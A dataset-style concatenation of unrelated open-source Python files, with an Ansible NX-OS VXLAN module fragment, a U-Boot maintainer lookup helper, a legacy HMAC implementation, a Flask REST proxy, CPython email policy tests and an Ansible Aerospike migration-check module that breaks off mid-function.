def state_present(module, existing, proposed, candidate):
commands = list()
proposed_commands = apply_key_map(PARAM_TO_COMMAND_KEYMAP, proposed)
existing_commands = apply_key_map(PARAM_TO_COMMAND_KEYMAP, existing)
for key, value in proposed_commands.items():
if key == 'associate-vrf':
command = 'member vni {0} {1}'.format(module.params['vni'], key)
if not value:
command = 'no {0}'.format(command)
commands.append(command)
elif key == 'peer-ip' and value != []:
for peer in value:
commands.append('{0} {1}'.format(key, peer))
elif key == 'mcast-group' and value != existing_commands.get(key):
commands.append('no {0}'.format(key))
vni_command = 'member vni {0}'.format(module.params['vni'])
if vni_command not in commands:
commands.append('member vni {0}'.format(module.params['vni']))
if value != PARAM_TO_DEFAULT_KEYMAP.get('multicast_group', 'default'):
commands.append('{0} {1}'.format(key, value))
elif key == 'ingress-replication protocol' and value != existing_commands.get(key):
evalue = existing_commands.get(key)
dvalue = PARAM_TO_DEFAULT_KEYMAP.get('ingress_replication', 'default')
if value != dvalue:
if evalue and evalue != dvalue:
commands.append('no {0} {1}'.format(key, evalue))
commands.append('{0} {1}'.format(key, value))
else:
if evalue:
commands.append('no {0} {1}'.format(key, evalue))
elif value is True:
commands.append(key)
elif value is False:
commands.append('no {0}'.format(key))
elif value == 'default' or value == []:
if existing_commands.get(key):
existing_value = existing_commands.get(key)
if key == 'peer-ip':
for peer in existing_value:
commands.append('no {0} {1}'.format(key, peer))
else:
commands.append('no {0} {1}'.format(key, existing_value))
else:
if key.replace(' ', '_').replace('-', '_') in BOOL_PARAMS:
commands.append('no {0}'.format(key.lower()))
else:
command = '{0} {1}'.format(key, value.lower())
commands.append(command)
if commands:
vni_command = 'member vni {0}'.format(module.params['vni'])
ingress_replications_command = 'ingress-replication protocol static'
ingress_replicationb_command = 'ingress-replication protocol bgp'
ingress_replicationns_command = 'no ingress-replication protocol static'
ingress_replicationnb_command = 'no ingress-replication protocol bgp'
interface_command = 'interface {0}'.format(module.params['interface'])
if any(c in commands for c in (ingress_replications_command, ingress_replicationb_command,
ingress_replicationnb_command, ingress_replicationns_command)):
static_level_cmds = [cmd for cmd in commands if 'peer' in cmd]
parents = [interface_command, vni_command]
commands = [cmd for cmd in commands if 'peer' not in cmd]
for cmd in commands:
parents.append(cmd)
candidate.add(static_level_cmds, parents=parents)
elif 'peer-ip' in commands[0]:
static_level_cmds = [cmd for cmd in commands]
parents = [interface_command, vni_command, ingress_replications_command]
candidate.add(static_level_cmds, parents=parents)
if vni_command in commands:
parents = [interface_command]
commands.remove(vni_command)
if module.params['assoc_vrf'] is None:
parents.append(vni_command)
candidate.add(commands, parents=parents)
def state_absent(module, existing, proposed, candidate):
if existing['assoc_vrf']:
commands = ['no member vni {0} associate-vrf'.format(
module.params['vni'])]
else:
commands = ['no member vni {0}'.format(module.params['vni'])]
parents = ['interface {0}'.format(module.params['interface'])]
candidate.add(commands, parents=parents)
def main():
argument_spec = dict(
interface=dict(required=True, type='str'),
vni=dict(required=True, type='str'),
assoc_vrf=dict(required=False, type='bool'),
multicast_group=dict(required=False, type='str'),
peer_list=dict(required=False, type='list'),
suppress_arp=dict(required=False, type='bool'),
suppress_arp_disable=dict(required=False, type='bool'),
ingress_replication=dict(required=False, type='str', choices=['bgp', 'static', 'default']),
state=dict(choices=['present', 'absent'], default='present', required=False),
)
argument_spec.update(nxos_argument_spec)
mutually_exclusive = [('suppress_arp', 'suppress_arp_disable'),
('assoc_vrf', 'multicast_group'),
('assoc_vrf', 'suppress_arp'),
('assoc_vrf', 'suppress_arp_disable'),
('assoc_vrf', 'ingress_replication')]
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True,
)
warnings = list()
result = {'changed': False, 'commands': [], 'warnings': warnings}
if module.params['peer_list']:
if module.params['peer_list'][0] != 'default' and module.params['ingress_replication'] != 'static':
module.fail_json(msg='ingress_replication=static is required '
'when using peer_list param')
else:
peer_list = module.params['peer_list']
if peer_list[0] == 'default':
module.params['peer_list'] = 'default'
else:
stripped_peer_list = list(map(str.strip, peer_list))
module.params['peer_list'] = stripped_peer_list
state = module.params['state']
args = PARAM_TO_COMMAND_KEYMAP.keys()
existing, interface_exist = get_existing(module, args)
if state == 'present':
if not interface_exist:
module.fail_json(msg="The proposed NVE interface does not exist. Use nxos_interface to create it first.")
elif interface_exist != module.params['interface']:
module.fail_json(msg='Only 1 NVE interface is allowed on the switch.')
elif state == 'absent':
if interface_exist != module.params['interface']:
module.exit_json(**result)
elif existing and existing['vni'] != module.params['vni']:
module.fail_json(
msg="ERROR: VNI delete failed: Could not find vni node for {0}".format(module.params['vni']),
existing_vni=existing['vni']
)
proposed_args = dict((k, v) for k, v in module.params.items()
if v is not None and k in args)
proposed = {}
for key, value in proposed_args.items():
if key in ['multicast_group', 'peer_list', 'ingress_replication']:
if str(value).lower() == 'default':
value = PARAM_TO_DEFAULT_KEYMAP.get(key, 'default')
if key != 'interface' and existing.get(key) != value:
proposed[key] = value
candidate = CustomNetworkConfig(indent=3)
if state == 'present':
state_present(module, existing, proposed, candidate)
elif existing and state == 'absent':
state_absent(module, existing, proposed, candidate)
if candidate:
candidate = candidate.items_text()
result['changed'] = True
result['commands'] = candidate
if not module.check_mode:
load_config(module, candidate)
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | 9,016,904,786,302,628,000 | 36.251989 | 117 | 0.609584 | false |
chris4795/u-boot-novena | tools/patman/get_maintainer.py | 8 | 1239 | # Copyright (c) 2012 The Chromium OS Authors.
#
# SPDX-License-Identifier: GPL-2.0+
#
import command
import gitutil
import os
def FindGetMaintainer():
"""Look for the get_maintainer.pl script.
Returns:
If the script is found we'll return a path to it; else None.
"""
try_list = [
os.path.join(gitutil.GetTopLevel(), 'scripts'),
]
# Look in the list
for path in try_list:
fname = os.path.join(path, 'get_maintainer.pl')
if os.path.isfile(fname):
return fname
return None
def GetMaintainer(fname, verbose=False):
"""Run get_maintainer.pl on a file if we find it.
We look for get_maintainer.pl in the 'scripts' directory at the top of
git. If we find it we'll run it. If we don't find get_maintainer.pl
then we fail silently.
Args:
fname: Path to the patch file to run get_maintainer.pl on.
Returns:
A list of email addresses to CC to.
"""
get_maintainer = FindGetMaintainer()
if not get_maintainer:
if verbose:
print("WARNING: Couldn't find get_maintainer.pl")
return []
stdout = command.Output(get_maintainer, '--norolestats', fname)
return stdout.splitlines()
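if __name__ == '__main__':
    # Minimal manual check, assuming this is run from inside a U-Boot
    # checkout and given a patch file path on the command line.
    import sys
    for address in GetMaintainer(sys.argv[1], verbose=True):
        print(address)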
| gpl-2.0 | 945,822,971,134,745,600 | 25.361702 | 74 | 0.634383 | false |
sanjuro/RCJK | vendor/gdata/Crypto/Hash/HMAC.py | 226 | 3330 | """HMAC (Keyed-Hashing for Message Authentication) Python module.
Implements the HMAC algorithm as described by RFC 2104.
This is just a copy of the Python 2.2 HMAC module, modified to work when
used on versions of Python before 2.2.
"""
__revision__ = "$Id: HMAC.py,v 1.5 2002/07/25 17:19:02 z3p Exp $"
import string
def _strxor(s1, s2):
"""Utility method. XOR the two strings s1 and s2 (must have same length).
"""
return "".join(map(lambda x, y: chr(ord(x) ^ ord(y)), s1, s2))
# The size of the digests returned by HMAC depends on the underlying
# hashing module used.
digest_size = None
class HMAC:
"""RFC2104 HMAC class.
This supports the API for Cryptographic Hash Functions (PEP 247).
"""
def __init__(self, key, msg = None, digestmod = None):
"""Create a new HMAC object.
key: key for the keyed hash object.
msg: Initial input for the hash, if provided.
digestmod: A module supporting PEP 247. Defaults to the md5 module.
"""
if digestmod == None:
import md5
digestmod = md5
self.digestmod = digestmod
self.outer = digestmod.new()
self.inner = digestmod.new()
try:
self.digest_size = digestmod.digest_size
except AttributeError:
self.digest_size = len(self.outer.digest())
blocksize = 64
ipad = "\x36" * blocksize
opad = "\x5C" * blocksize
if len(key) > blocksize:
key = digestmod.new(key).digest()
key = key + chr(0) * (blocksize - len(key))
self.outer.update(_strxor(key, opad))
self.inner.update(_strxor(key, ipad))
if (msg):
self.update(msg)
## def clear(self):
## raise NotImplementedError, "clear() method not available in HMAC."
def update(self, msg):
"""Update this hashing object with the string msg.
"""
self.inner.update(msg)
def copy(self):
"""Return a separate copy of this hashing object.
An update to this copy won't affect the original object.
"""
other = HMAC("")
other.digestmod = self.digestmod
other.inner = self.inner.copy()
other.outer = self.outer.copy()
return other
def digest(self):
"""Return the hash value of this hashing object.
This returns a string containing 8-bit data. The object is
not altered in any way by this function; you can continue
updating the object after calling this function.
"""
h = self.outer.copy()
h.update(self.inner.digest())
return h.digest()
def hexdigest(self):
"""Like digest(), but returns a string of hexadecimal digits instead.
"""
return "".join([string.zfill(hex(ord(x))[2:], 2)
for x in tuple(self.digest())])
def new(key, msg = None, digestmod = None):
"""Create a new hashing object and return it.
key: The starting key for the hash.
msg: if available, will immediately be hashed into the object's starting
state.
You can now feed arbitrary strings into the object using its update()
method, and can ask for the hash value at any time by calling its digest()
method.
"""
return HMAC(key, msg, digestmod)
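if __name__ == '__main__':
    # Minimal usage sketch of the PEP 247 style API described above; the
    # key and message strings are illustrative only.
    h = new('secret-key', 'message to authenticate')
    print h.hexdigest()
    # Incremental updates hash the concatenation of the chunks fed in.
    h2 = new('secret-key')
    h2.update('message to ')
    h2.update('authenticate')
    assert h.hexdigest() == h2.hexdigest()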
| apache-2.0 | 1,505,576,636,388,951,300 | 29.833333 | 78 | 0.606306 | false |
wayetender/whip | whip/src/adapter/frontends/rest.py | 1 | 3325 | from . import ProxyTerminus
from flask import Flask
from flask import request
from flask import make_response
import urllib2
import socket
import json
import threading
import datetime
import ssl
import logging
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
network_times = open('times', 'w')
network_times.truncate()
class RestProxyTerminus(ProxyTerminus):
def __init__(self, ip, port):
self.actual_ip = ip
self.actual_port = port
def serve_requests(self, client_proxy, endpoint = None):
'''returns: endpoint it is listening on'''
context = ('server.pem', 'server.pem')
if not endpoint:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
port = sock.getsockname()[1]
sock.close()
host = '0.0.0.0'
else:
host = endpoint[0]
port = endpoint[1]
self.app = Flask(__name__)
def handle(p):
try:
arg = {
'args': dict(request.args.items()),
'headers': dict(request.headers.items())
}
result = client_proxy.on_unproxied_request('/%s' % p, [arg])
resp = make_response(json.dumps(result['body']))
for (header, v) in result['headers'].items():
if header == 'content-length': continue
resp.headers[header] = v
return resp
except:
import sys, traceback
                traceback.print_exc(file=sys.stdout)
print sys.exc_info()
self.app.add_url_rule("/<path:p>", 'handle', handle)
self.app.config['PROPAGATE_EXCEPTIONS'] =True
t = threading.Thread(target=lambda: self.app.run(host=host, port=port, ssl_context=context, threaded=True, debug=False, ))
t.setDaemon(True)
t.start()
return ('127.0.0.1', port)
def execute_request(self, callsite):
h = callsite.args[0]['headers']['Host']
apath = 'https://%s:%s%s' % (h, self.actual_port, callsite.opname) if ':' not in h else "https://%s%s" % (h, callsite.opname)
context = ssl._create_unverified_context()
nrequest = urllib2.Request(apath)
for (header, v) in callsite.args[0]['headers'].items():
if header == 'Content-Length' or header == 'Accept-Encoding': continue
nrequest.add_header(header, v)
startTime = datetime.datetime.now()
proxy_resp = urllib2.urlopen(nrequest, context=context)
body = str(proxy_resp.read()).encode('ascii', 'ignore')
code = proxy_resp.getcode()
tempTime = (datetime.datetime.now() - startTime).total_seconds() * 1000
network_times.write("%s\n" % tempTime)
network_times.flush()
res = {
'headers': dict(proxy_resp.info()),
'body': json.loads(body),
'code': code
}
return res
def generate(config, terminal, serviceconfig):
if 'mapsto' not in serviceconfig:
raise ValueError("mapstoservice must be set")
(ip, port) = serviceconfig['actual']
frompath = serviceconfig.get('fromhttppath', None)
return RestProxyTerminus(ip, port)
| gpl-2.0 | 5,410,570,434,407,805,000 | 34 | 133 | 0.571128 | false |
Zhongqilong/kbengine | kbe/res/scripts/common/Lib/test/test_email/test_policy.py | 79 | 13417 | import io
import types
import textwrap
import unittest
import email.policy
import email.parser
import email.generator
from email import headerregistry
def make_defaults(base_defaults, differences):
defaults = base_defaults.copy()
defaults.update(differences)
return defaults
class PolicyAPITests(unittest.TestCase):
longMessage = True
# Base default values.
compat32_defaults = {
'max_line_length': 78,
'linesep': '\n',
'cte_type': '8bit',
'raise_on_defect': False,
}
# These default values are the ones set on email.policy.default.
# If any of these defaults change, the docs must be updated.
policy_defaults = compat32_defaults.copy()
policy_defaults.update({
'raise_on_defect': False,
'header_factory': email.policy.EmailPolicy.header_factory,
'refold_source': 'long',
'content_manager': email.policy.EmailPolicy.content_manager,
})
# For each policy under test, we give here what we expect the defaults to
# be for that policy. The second argument to make defaults is the
# difference between the base defaults and that for the particular policy.
new_policy = email.policy.EmailPolicy()
policies = {
email.policy.compat32: make_defaults(compat32_defaults, {}),
email.policy.default: make_defaults(policy_defaults, {}),
email.policy.SMTP: make_defaults(policy_defaults,
{'linesep': '\r\n'}),
email.policy.HTTP: make_defaults(policy_defaults,
{'linesep': '\r\n',
'max_line_length': None}),
email.policy.strict: make_defaults(policy_defaults,
{'raise_on_defect': True}),
new_policy: make_defaults(policy_defaults, {}),
}
# Creating a new policy creates a new header factory. There is a test
# later that proves this.
policies[new_policy]['header_factory'] = new_policy.header_factory
def test_defaults(self):
for policy, expected in self.policies.items():
for attr, value in expected.items():
self.assertEqual(getattr(policy, attr), value,
("change {} docs/docstrings if defaults have "
"changed").format(policy))
def test_all_attributes_covered(self):
for policy, expected in self.policies.items():
for attr in dir(policy):
if (attr.startswith('_') or
isinstance(getattr(email.policy.EmailPolicy, attr),
types.FunctionType)):
continue
else:
self.assertIn(attr, expected,
"{} is not fully tested".format(attr))
def test_abc(self):
with self.assertRaises(TypeError) as cm:
email.policy.Policy()
msg = str(cm.exception)
abstract_methods = ('fold',
'fold_binary',
'header_fetch_parse',
'header_source_parse',
'header_store_parse')
for method in abstract_methods:
self.assertIn(method, msg)
def test_policy_is_immutable(self):
for policy, defaults in self.policies.items():
for attr in defaults:
with self.assertRaisesRegex(AttributeError, attr+".*read-only"):
setattr(policy, attr, None)
with self.assertRaisesRegex(AttributeError, 'no attribute.*foo'):
policy.foo = None
def test_set_policy_attrs_when_cloned(self):
# None of the attributes has a default value of None, so we set them
# all to None in the clone call and check that it worked.
for policyclass, defaults in self.policies.items():
testattrdict = {attr: None for attr in defaults}
policy = policyclass.clone(**testattrdict)
for attr in defaults:
self.assertIsNone(getattr(policy, attr))
def test_reject_non_policy_keyword_when_called(self):
for policyclass in self.policies:
with self.assertRaises(TypeError):
policyclass(this_keyword_should_not_be_valid=None)
with self.assertRaises(TypeError):
policyclass(newtline=None)
def test_policy_addition(self):
expected = self.policy_defaults.copy()
p1 = email.policy.default.clone(max_line_length=100)
p2 = email.policy.default.clone(max_line_length=50)
added = p1 + p2
expected.update(max_line_length=50)
for attr, value in expected.items():
self.assertEqual(getattr(added, attr), value)
added = p2 + p1
expected.update(max_line_length=100)
for attr, value in expected.items():
self.assertEqual(getattr(added, attr), value)
added = added + email.policy.default
for attr, value in expected.items():
self.assertEqual(getattr(added, attr), value)
def test_register_defect(self):
class Dummy:
def __init__(self):
self.defects = []
obj = Dummy()
defect = object()
policy = email.policy.EmailPolicy()
policy.register_defect(obj, defect)
self.assertEqual(obj.defects, [defect])
defect2 = object()
policy.register_defect(obj, defect2)
self.assertEqual(obj.defects, [defect, defect2])
class MyObj:
def __init__(self):
self.defects = []
class MyDefect(Exception):
pass
def test_handle_defect_raises_on_strict(self):
foo = self.MyObj()
defect = self.MyDefect("the telly is broken")
with self.assertRaisesRegex(self.MyDefect, "the telly is broken"):
email.policy.strict.handle_defect(foo, defect)
def test_handle_defect_registers_defect(self):
foo = self.MyObj()
defect1 = self.MyDefect("one")
email.policy.default.handle_defect(foo, defect1)
self.assertEqual(foo.defects, [defect1])
defect2 = self.MyDefect("two")
email.policy.default.handle_defect(foo, defect2)
self.assertEqual(foo.defects, [defect1, defect2])
class MyPolicy(email.policy.EmailPolicy):
defects = None
def __init__(self, *args, **kw):
super().__init__(*args, defects=[], **kw)
def register_defect(self, obj, defect):
self.defects.append(defect)
def test_overridden_register_defect_still_raises(self):
foo = self.MyObj()
defect = self.MyDefect("the telly is broken")
with self.assertRaisesRegex(self.MyDefect, "the telly is broken"):
self.MyPolicy(raise_on_defect=True).handle_defect(foo, defect)
def test_overriden_register_defect_works(self):
foo = self.MyObj()
defect1 = self.MyDefect("one")
my_policy = self.MyPolicy()
my_policy.handle_defect(foo, defect1)
self.assertEqual(my_policy.defects, [defect1])
self.assertEqual(foo.defects, [])
defect2 = self.MyDefect("two")
my_policy.handle_defect(foo, defect2)
self.assertEqual(my_policy.defects, [defect1, defect2])
self.assertEqual(foo.defects, [])
def test_default_header_factory(self):
h = email.policy.default.header_factory('Test', 'test')
self.assertEqual(h.name, 'Test')
self.assertIsInstance(h, headerregistry.UnstructuredHeader)
self.assertIsInstance(h, headerregistry.BaseHeader)
class Foo:
parse = headerregistry.UnstructuredHeader.parse
def test_each_Policy_gets_unique_factory(self):
policy1 = email.policy.EmailPolicy()
policy2 = email.policy.EmailPolicy()
policy1.header_factory.map_to_type('foo', self.Foo)
h = policy1.header_factory('foo', 'test')
self.assertIsInstance(h, self.Foo)
self.assertNotIsInstance(h, headerregistry.UnstructuredHeader)
h = policy2.header_factory('foo', 'test')
self.assertNotIsInstance(h, self.Foo)
self.assertIsInstance(h, headerregistry.UnstructuredHeader)
def test_clone_copies_factory(self):
policy1 = email.policy.EmailPolicy()
policy2 = policy1.clone()
policy1.header_factory.map_to_type('foo', self.Foo)
h = policy1.header_factory('foo', 'test')
self.assertIsInstance(h, self.Foo)
h = policy2.header_factory('foo', 'test')
self.assertIsInstance(h, self.Foo)
def test_new_factory_overrides_default(self):
mypolicy = email.policy.EmailPolicy()
myfactory = mypolicy.header_factory
newpolicy = mypolicy + email.policy.strict
self.assertEqual(newpolicy.header_factory, myfactory)
newpolicy = email.policy.strict + mypolicy
self.assertEqual(newpolicy.header_factory, myfactory)
def test_adding_default_policies_preserves_default_factory(self):
newpolicy = email.policy.default + email.policy.strict
self.assertEqual(newpolicy.header_factory,
email.policy.EmailPolicy.header_factory)
self.assertEqual(newpolicy.__dict__, {'raise_on_defect': True})
# XXX: Need subclassing tests.
# For adding subclassed objects, make sure the usual rules apply (subclass
# wins), but that the order still works (right overrides left).
class TestPolicyPropagation(unittest.TestCase):
# The abstract methods are used by the parser but not by the wrapper
# functions that call it, so if the exception gets raised we know that the
# policy was actually propagated all the way to feedparser.
class MyPolicy(email.policy.Policy):
def badmethod(self, *args, **kw):
raise Exception("test")
        fold = fold_binary = header_fetch_parse = badmethod
header_source_parse = header_store_parse = badmethod
def test_message_from_string(self):
with self.assertRaisesRegex(Exception, "^test$"):
email.message_from_string("Subject: test\n\n",
policy=self.MyPolicy)
def test_message_from_bytes(self):
with self.assertRaisesRegex(Exception, "^test$"):
email.message_from_bytes(b"Subject: test\n\n",
policy=self.MyPolicy)
def test_message_from_file(self):
f = io.StringIO('Subject: test\n\n')
with self.assertRaisesRegex(Exception, "^test$"):
email.message_from_file(f, policy=self.MyPolicy)
def test_message_from_binary_file(self):
f = io.BytesIO(b'Subject: test\n\n')
with self.assertRaisesRegex(Exception, "^test$"):
email.message_from_binary_file(f, policy=self.MyPolicy)
# These are redundant, but we need them for black-box completeness.
def test_parser(self):
p = email.parser.Parser(policy=self.MyPolicy)
with self.assertRaisesRegex(Exception, "^test$"):
p.parsestr('Subject: test\n\n')
def test_bytes_parser(self):
p = email.parser.BytesParser(policy=self.MyPolicy)
with self.assertRaisesRegex(Exception, "^test$"):
p.parsebytes(b'Subject: test\n\n')
# Now that we've established that all the parse methods get the
# policy in to feedparser, we can use message_from_string for
# the rest of the propagation tests.
def _make_msg(self, source='Subject: test\n\n', policy=None):
self.policy = email.policy.default.clone() if policy is None else policy
return email.message_from_string(source, policy=self.policy)
def test_parser_propagates_policy_to_message(self):
msg = self._make_msg()
self.assertIs(msg.policy, self.policy)
def test_parser_propagates_policy_to_sub_messages(self):
msg = self._make_msg(textwrap.dedent("""\
Subject: mime test
MIME-Version: 1.0
Content-Type: multipart/mixed, boundary="XXX"
--XXX
Content-Type: text/plain
test
--XXX
Content-Type: text/plain
test2
--XXX--
"""))
for part in msg.walk():
self.assertIs(part.policy, self.policy)
def test_message_policy_propagates_to_generator(self):
msg = self._make_msg("Subject: test\nTo: foo\n\n",
policy=email.policy.default.clone(linesep='X'))
s = io.StringIO()
g = email.generator.Generator(s)
g.flatten(msg)
self.assertEqual(s.getvalue(), "Subject: testXTo: fooXX")
def test_message_policy_used_by_as_string(self):
msg = self._make_msg("Subject: test\nTo: foo\n\n",
policy=email.policy.default.clone(linesep='X'))
self.assertEqual(msg.as_string(), "Subject: testXTo: fooXX")
class TestConcretePolicies(unittest.TestCase):
def test_header_store_parse_rejects_newlines(self):
instance = email.policy.EmailPolicy()
self.assertRaises(ValueError,
instance.header_store_parse,
'From', 'spam\[email protected]')
if __name__ == '__main__':
unittest.main()
| lgpl-3.0 | -7,406,632,348,161,437,000 | 39.412651 | 80 | 0.606246 | false |
drawks/ansible | lib/ansible/modules/database/aerospike/aerospike_migrations.py | 25 | 18758 | #!/usr/bin/python
"""short_description: Check or wait for migrations between nodes"""
# Copyright: (c) 2018, Albert Autin
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: aerospike_migrations
short_description: Check or wait for migrations between nodes
description:
- This can be used to check for migrations in a cluster.
This makes it easy to do a rolling upgrade/update on Aerospike nodes.
    - If waiting for migrations is not desired, simply poll until
      port 3000 is available or asinfo -v status returns ok
version_added: 2.8
author: "Albert Autin (@Alb0t)"
options:
host:
description:
- Which host do we use as seed for info connection
required: False
type: str
default: localhost
port:
description:
- Which port to connect to Aerospike on (service port)
required: False
type: int
default: 3000
connect_timeout:
description:
- How long to try to connect before giving up (milliseconds)
required: False
type: int
default: 1000
consecutive_good_checks:
description:
- How many times should the cluster report "no migrations"
consecutively before returning OK back to ansible?
required: False
type: int
default: 3
sleep_between_checks:
description:
- How long to sleep between each check (seconds).
required: False
type: int
default: 60
tries_limit:
description:
- How many times do we poll before giving up and failing?
default: 300
required: False
type: int
local_only:
description:
- Do you wish to only check for migrations on the local node
before returning, or do you want all nodes in the cluster
to finish before returning?
required: True
type: bool
min_cluster_size:
description:
- Check will return bad until cluster size is met
or until tries is exhausted
required: False
type: int
default: 1
fail_on_cluster_change:
description:
            - Fail if the cluster key changes.
              If something else is changing the cluster, we may want to fail.
required: False
type: bool
default: True
migrate_tx_key:
description:
- The metric key used to determine if we have tx migrations
remaining. Changeable due to backwards compatibility.
required: False
type: str
default: migrate_tx_partitions_remaining
migrate_rx_key:
description:
- The metric key used to determine if we have rx migrations
remaining. Changeable due to backwards compatibility.
required: False
type: str
default: migrate_rx_partitions_remaining
target_cluster_size:
description:
- When all aerospike builds in the cluster are greater than
version 4.3, then the C(cluster-stable) info command will be used.
Inside this command, you can optionally specify what the target
cluster size is - but it is not necessary. You can still rely on
min_cluster_size if you don't want to use this option.
- If this option is specified on a cluster that has at least 1
host <4.3 then it will be ignored until the min version reaches
4.3.
required: False
type: int
'''
EXAMPLES = '''
# check for migrations on local node
- name: wait for migrations on local node before proceeding
aerospike_migrations:
host: "localhost"
connect_timeout: 2000
consecutive_good_checks: 5
sleep_between_checks: 15
tries_limit: 600
local_only: False
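# Illustrative variant: cluster-wide check; the target size of 5 is an
# assumed value and only applies once every node runs Aerospike >= 4.3
- name: wait for migrations across the whole cluster
  aerospike_migrations:
    host: "localhost"
    local_only: False
    target_cluster_size: 5
    min_cluster_size: 5
    sleep_between_checks: 30
    tries_limit: 120
    consecutive_good_checks: 5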
# example playbook:
---
- name: upgrade aerospike
hosts: all
become: true
serial: 1
tasks:
- name: Install dependencies
apt:
name:
- python
- python-pip
- python-setuptools
state: latest
- name: setup aerospike
pip:
name: aerospike
# check for migrations every (sleep_between_checks)
# If at least (consecutive_good_checks) checks come back OK in a row, then return OK.
# Will exit if any exception, which can be caused by bad nodes,
# nodes not returning data, or other reasons.
# Maximum runtime before giving up in this case will be:
# Tries Limit * Sleep Between Checks * delay * retries
- name: wait for aerospike migrations
aerospike_migrations:
local_only: True
sleep_between_checks: 1
tries_limit: 5
consecutive_good_checks: 3
fail_on_cluster_change: true
min_cluster_size: 3
target_cluster_size: 4
register: migrations_check
until: migrations_check is succeeded
changed_when: false
delay: 60
retries: 120
- name: another thing
shell: |
echo foo
- name: reboot
reboot:
'''
RETURN = '''
# Returns only a success/failure result. Changed is always false.
'''
import traceback
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
LIB_FOUND_ERR = None
try:
import aerospike
from time import sleep
import re
except ImportError as ie:
LIB_FOUND = False
LIB_FOUND_ERR = traceback.format_exc()
else:
LIB_FOUND = True
def run_module():
"""run ansible module"""
module_args = dict(
host=dict(type='str', required=False, default='localhost'),
port=dict(type='int', required=False, default=3000),
connect_timeout=dict(type='int', required=False, default=1000),
consecutive_good_checks=dict(type='int', required=False, default=3),
sleep_between_checks=dict(type='int', required=False, default=60),
        tries_limit=dict(type='int', required=False, default=300),
local_only=dict(type='bool', required=True),
min_cluster_size=dict(type='int', required=False, default=1),
target_cluster_size=dict(type='int', required=False, default=None),
fail_on_cluster_change=dict(type='bool', required=False, default=True),
migrate_tx_key=dict(type='str', required=False,
default="migrate_tx_partitions_remaining"),
migrate_rx_key=dict(type='str', required=False,
default="migrate_rx_partitions_remaining")
)
result = dict(
changed=False,
)
module = AnsibleModule(
argument_spec=module_args,
supports_check_mode=True
)
if not LIB_FOUND:
module.fail_json(msg=missing_required_lib('aerospike'),
exception=LIB_FOUND_ERR)
try:
if module.check_mode:
has_migrations, skip_reason = False, None
else:
migrations = Migrations(module)
has_migrations, skip_reason = migrations.has_migs(
module.params['local_only']
)
if has_migrations:
module.fail_json(msg="Failed.", skip_reason=skip_reason)
except Exception as e:
module.fail_json(msg="Error: {0}".format(e))
module.exit_json(**result)
class Migrations:
""" Check or wait for migrations between nodes """
def __init__(self, module):
self.module = module
self._client = self._create_client().connect()
self._nodes = {}
self._update_nodes_list()
self._cluster_statistics = {}
self._update_cluster_statistics()
self._namespaces = set()
self._update_cluster_namespace_list()
self._build_list = set()
self._update_build_list()
self._start_cluster_key = \
self._cluster_statistics[self._nodes[0]]['cluster_key']
def _create_client(self):
""" TODO: add support for auth, tls, and other special features
I won't use those features, so I'll wait until somebody complains
or does it for me (Cross fingers)
create the client object"""
config = {
'hosts': [
(self.module.params['host'], self.module.params['port'])
],
'policies': {
'timeout': self.module.params['connect_timeout']
}
}
return aerospike.client(config)
def _info_cmd_helper(self, cmd, node=None, delimiter=';'):
"""delimiter is for seperate stats that come back, NOT for kv
separation which is ="""
if node is None: # If no node passed, use the first one (local)
node = self._nodes[0]
data = self._client.info_node(cmd, node)
data = data.split("\t")
if len(data) != 1 and len(data) != 2:
self.module.fail_json(
msg="Unexpected number of values returned in info command: " +
str(len(data))
)
# data will be in format 'command\touput'
data = data[-1]
data = data.rstrip("\n\r")
data_arr = data.split(delimiter)
# some commands don't return in kv format
# so we dont want a dict from those.
if '=' in data:
retval = dict(
metric.split("=", 1) for metric in data_arr
)
else:
# if only 1 element found, and not kv, return just the value.
if len(data_arr) == 1:
retval = data_arr[0]
else:
retval = data_arr
return retval
def _update_build_list(self):
"""creates self._build_list which is a unique list
of build versions."""
self._build_list = set()
for node in self._nodes:
build = self._info_cmd_helper('build', node)
self._build_list.add(build)
# just checks to see if the version is 4.3 or greater
def _can_use_cluster_stable(self):
# if version <4.3 we can't use cluster-stable info cmd
# regex hack to check for versions beginning with 0-3 or
# beginning with 4.0,4.1,4.2
if re.search(R'^([0-3]\.|4\.[0-2])', min(self._build_list)):
return False
return True
def _update_cluster_namespace_list(self):
""" make a unique list of namespaces
TODO: does this work on a rolling namespace add/deletion?
        thankfully if it doesn't, we don't need this on builds >=4.3"""
self._namespaces = set()
for node in self._nodes:
namespaces = self._info_cmd_helper('namespaces', node)
for namespace in namespaces:
self._namespaces.add(namespace)
def _update_cluster_statistics(self):
"""create a dict of nodes with their related stats """
self._cluster_statistics = {}
for node in self._nodes:
self._cluster_statistics[node] = \
self._info_cmd_helper('statistics', node)
def _update_nodes_list(self):
"""get a fresh list of all the nodes"""
self._nodes = self._client.get_nodes()
if not self._nodes:
self.module.fail_json("Failed to retrieve at least 1 node.")
def _namespace_has_migs(self, namespace, node=None):
"""returns a True or False.
Does the namespace have migrations for the node passed?
If no node passed, uses the local node or the first one in the list"""
namespace_stats = self._info_cmd_helper("namespace/" + namespace, node)
try:
namespace_tx = \
int(namespace_stats[self.module.params['migrate_tx_key']])
namespace_rx = \
                int(namespace_stats[self.module.params['migrate_rx_key']])
except KeyError:
self.module.fail_json(
msg="Did not find partition remaining key:" +
self.module.params['migrate_tx_key'] +
" or key:" +
self.module.params['migrate_rx_key'] +
" in 'namespace/" +
namespace +
"' output."
)
except TypeError:
self.module.fail_json(
msg="namespace stat returned was not numerical"
)
return namespace_tx != 0 or namespace_rx != 0
def _node_has_migs(self, node=None):
"""just calls namespace_has_migs and
if any namespace has migs returns true"""
migs = 0
self._update_cluster_namespace_list()
for namespace in self._namespaces:
if self._namespace_has_migs(namespace, node):
migs += 1
return migs != 0
def _cluster_key_consistent(self):
"""create a dictionary to store what each node
returns the cluster key as. we should end up with only 1 dict key,
with the key being the cluster key."""
cluster_keys = {}
for node in self._nodes:
cluster_key = self._cluster_statistics[node][
'cluster_key']
